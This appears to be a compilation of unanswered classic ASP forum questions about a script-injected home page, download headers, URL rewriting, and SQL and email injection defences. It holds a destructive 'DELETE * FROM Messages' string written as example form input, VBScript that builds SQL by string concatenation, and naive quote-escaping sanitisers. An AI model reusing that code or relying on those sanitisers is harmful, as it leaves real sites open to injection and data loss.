New Type Of Injection? Rewrite Default Document?
This is weird, I'm pretty familiar with SQL Injection - but we're getting these weird injections that are writing in the default document or home page. What it's doing is putting in script code at the top or bottom of the home page... it looks something like this:
What it's doing is decoding itself into an iframe that links out to popups that will try and download a virus on your machine. I don't get the popup on my machine because I think I have a newer version of IE. But some people have complained that it is installing a virus on their machine.
Also what is crazy is when I replace the file with a good version. In about 30 mins, it is automatically overwritten with the infected version. Also I've noticed it on some other websites that I haven't touched.
Has anyone encountered this before? Because I'm stumped as to the cause of it. I don't see the issue on our dev server. It seems to be IIS on a shared host.
I have an asp page that produces output from a database. This allows a
simple way for the user to save the data to a text file by going to
File->Save as...
The default save as options always defaults to a particular filename and the
save as type is always html, therefore the user has to manually type a
filename and choose Text File (*.txt) as the type.
I remember I was able to override these options with the following code.
Response.ContentType = "text/plain"
Response.AddHeader "Content-Disposition", "inline; filename=myfilename"
This doesn't seem to be working for me anymore.
Any thoughts?
I'm using a binary stream to send down a file with ASP from the web
server. I've been having trouble with IE and getting it to recognize
my file. I've added the filename as a parameter (?filename=file.jpgw)
to handle IE's mime type mangling, but I'm still having trouble with
IE's default Save As Type being HTML.
When we send down a jpgw
(geo-jpeg) file IE wants to save it as an HTML file. I've got the
correct filename showing in the Filename box, and if I choose the All
Files option from the Save As Type drop down then the file is saved
with the correct extension. I'd like to have the All Files option
chosen by default. I know it's just a couple of clicks but we have
some novice users that can't seem to get that.
I'm building a system where a presenter uploads a PPT to my server and
then I show it to all the participants. The problem is that most of the
media in the PPT is usually linked, so I'll need to upload all that
too.
Assuming I can parse the PPT and figure the exact name and
location of each of the media files I need from his hard-disk, is there
any way I can upload all these files automatically, without having to
make the user choose each of these files manually? If that's not
possible, can I at least show the user a page with a list of input boxes
of type file, pre-populated with the file-path and name of the media
files I need, so that the user can just click 'Submit' without having
to browse and select each of them?
Please say yes. It would be a major usability crisis if my users had to
keep hitting the browse button so many times for each PPT! Especially
when I know exactly what files I need and where they are! I know that
this has a lot to do with browser security, but there's got to be SOME
way out?
I have some ASP pages on my intranet site providing a helpdesk to my users. As part of logging a helpdesk call I am prompting them to link to a file using input type="file".
The file is on a network drive and the problem is when you click on the browse button it defaults to the client's desktop as the starting point of the browsing process. I would like to set a default location to start browsing, e.g. \\network_server\helpdesk, to avoid confusion. Does anyone know of a way to do this?
How to show the URL without .asp or query string with parameters behind?
For example, I have a URL string: www.abc.com/abc/abc.asp?id=1. How can I display the URL in this format without the querystring? Example: www.abc.com/abc/1
Some of my ASP pages are dynamically generated, which we all know is a bad practice in terms of SEO. I've been trying to find a way to convert these dynamic pages to static pages. I found some articles about ISAPI rewrite but according to them, it only works on dedicated servers; I'm still not sure about this though. By the way, is it possible just to code these and generate a static ASP page from a dynamic page? Do you have some sample code on how to do this?
How best to get an entire .asp dynamic site geared to Search Engines - I have looked at possible URL rewrites but that may not work as the site isn't on a dedicated server?
Basically I've got a URL:
http://www.thepagename.com/town_pag...n_name=WHATEVER
Basically need that to be written and shown in the browser like:
www.thepagename.com/WHATEVER.html
Notice how I've added the .html, that's for our Search Engine
Optimisation, or it may not be needed?
If I want to rewrite URLs like:
http://www.mysite.com/check.asp?id=213&cat=USA
how can I rewrite this URL to make it friendly?
Been searching for a program to do an ASP re-write to help with the dynamic URLs. Most want something to install. I noticed that .NET has something - can that possibly be used or is there something else out there that actually does not have to be installed on the server?
I have a site hosted at Verio that has four different domain names pointing to it. So when you browse to any of the four domain names, the same site is displayed. What I would like to do is make it so www.domain1.com is the primary URL, and if anyone browses to the site using any of the other addresses, the address is changed to reflect
www.domain1.com.
Furthermore, I'd like it so if someone navigates to www.domain2.com/somepage.asp, the address is changed and the path is retained, so the browser's address bar changes to www.domain1.com/somepage.asp.
Is this possible to do when I don't have much access to the server (i.e. Verio-hosted space)? What code can I use to do this?
In apache I used a feature called a "Rewrite rule" inside a .htaccess
file to process the URL :
i.e. http://www/mypage.html =http://www/page.php?page=mypage
Now I'd like to do a similar action on an IIS server with ASP (not
.net)...
Can anyone tell me how you can do this?
Where can I find some ASP hosting which comes with the ISAPI rewrite component, without me having to buy a dedicated server?
I'm looking for help in setting up a URL rewrite using ISAPI Rewrite. The component is installed on my server, which is win2003. What I'm looking to set up is an asp page or whatever to rewrite the URL domain/MyAd/66 so it will point to domain/homeDetail.asp?AD_ID=66. I also want to be sure that I don't screw up my search engine visibility with this. Looking for some help, examples, etc.
I have a dedicated server running on IIS 6 (hosting company). Where should I place the rules for rewriting URLs? E.g.:
RewriteEngine On
RewriteRule /agents/(.*)/.* /realestateagent.asp?id=$1
I have some code I need modified and I can't seem to figure it out. Here's the section of code I need to change: ....
I have some asp code in a variable, so I want to rewrite anchor tags like this:
If I have:
<a href="http://www.sitepoint.com">www.sitepoint.com</a>
To be rewritten as:
<a href="http://www.sitepoint.com" target="_blank">www.sitepoint.com</a> out
The problem is that URLs from my domain shouldn't be changed, for example if href="/some_path" or href="http://www.mysite.com/some_path"
I tried making some expressions with RegexBuddy but it didn't work very nicely.
I got a problem while running an application. The code for this is as follows:
aList = Split(strMsg,";")
For nX = 0 to UBound(aList)
strarry=split(aList(nX),"_")
var_year=left(strarry(2),4)
var_month=mid(strarry(2),5,2)
var_day=mid(strarry(2),7,2)
var_date=var_day&"-"&var_month&"-"&var_year
var_time1=mid(strarry(2),9,2)
var_time2=mid(strarry(2),11,2)
var_time=var_time1&":"&var_time2
set rs1=conn.execute("insert into tbl_BackupfileInfo(Filename,Createddate,Createdtime)values('" &aList(nX)&"','"&var_date&"','"&var_time&"')")
Next
While running this application, sometimes it works fine. But sometimes it gives an error:
Error Type:Microsoft VBScript runtime (0x800A000D) Type mismatch: 'UBound'.
I recently built a login page and a friend of mine was working on something similar and said that I need to protect the login from SQL injection. I am not really sure what exactly that is. I think I have a rough idea but can someone explain it to me?
In addition, I will need to obviously protect what I built and am not sure how to go about doing that either.
Does anybody have a list of dodgy characters that can be used for SQL injection attacks so that I can figure out a way to strip them from user inputs?
Also, if somebody was filling in a form that inserts into a "memo" field in Access, could this be used to launch such an attack or would whatever they type simply be inserted into the field? I hope that bit is clear.
I have a form field "message" which is a multi-line text box. If someone typed into that box
DELETE * FROM Messages WHERE MessageID =1205
or some other command, would that simply be inserted into the database or would the server try and execute the command?
I have heard a lot about SQL Injection. I was wondering how does an injector come to know about the table/column name when they cannot see the asp codes in a website?
How do I test for SQL injection?
Do I do a SELECT statement in my username login?
I just wanted to share it with you guys and ask your opinions. Code:
Is it possible to "intercept" all calls to conn.execute and have them go to
a checking routine that will either let the command go through or terminate
it if it contains some illegal instructions? My client's company has had its
hacker free status revoked due to the possibility of sql injection. I could
put a function before every single conn.execute but we have hundreds of
them. Just wondering if there is some way of telling it to do something else
first. Maybe I can redefine conn.execute somehow?
I have written several site functions to hopefully protect against cross-site hacking, SQL injection, and URL encoding. I also have a symmetric key encryption that is pretty basic (which isn't posted here and is total overkill). I was wondering if these functions are protecting well enough, or am I missing some tests?
Function InjFix(val)
InjFix=SEncode(Trim(Replace(val,"'","''")))
end Function
Function SEncode(val)
SEncode=Server.HtmlEncode(val)
end Function
Function URLEncode(val)
URLEncode=Server.URLEncode(val)
end Function
I am using the method below to make sure that the query isNumeric and not longer than 4. It's a little snippet I found in another post... It works fine but I'm questioning whether it's enough.
URLs like this, itemdetail.asp?-=#&ItemID=906, don't throw any errors because the "ItemID=906" is fine. Does the method used below really protect against SQL Injections in this case?
Code: ....
I have feedback forms on several of my sites and recently, they have been plagued with email injection attacks.
The forms are pretty straight-forward. Half a dozen fields get submitted to a formhandler.asp page where the contents are sent to some hard-coded email addresses using ASPmail.
From what I understand about how this works, spambots are used to add carriage returns after some of the form fields and then adding BCCs in to use the form to send out spam to other addresses. Here's an example of the emails I'm getting: .....
Anyone got some good methods for preventing html-injection in ASP?
I have always validated user input to pieces prior to integrating it into a SQL statement, in order to avoid SQL Injection attacks. A colleague of mine told me that binding my vars would make them SQL scalar, but I have been left in the dark as to HOW... The web left me none the wiser, as well, so here goes: Anyone got a brief example of binding vars in ASP to get me started?
I believe someone is using my contact form and sending out spam. I'm getting thousands of undeliverable emails.
I don't know anything about ASP. Someone who used to work here wrote the form processing script and it seems that all the forms on different domains are being processed by this script. It seems like they didn't do any sort of validation or checks and on one website there are hundreds of pages with the contact form. I could do it in PHP but that is way too much work.....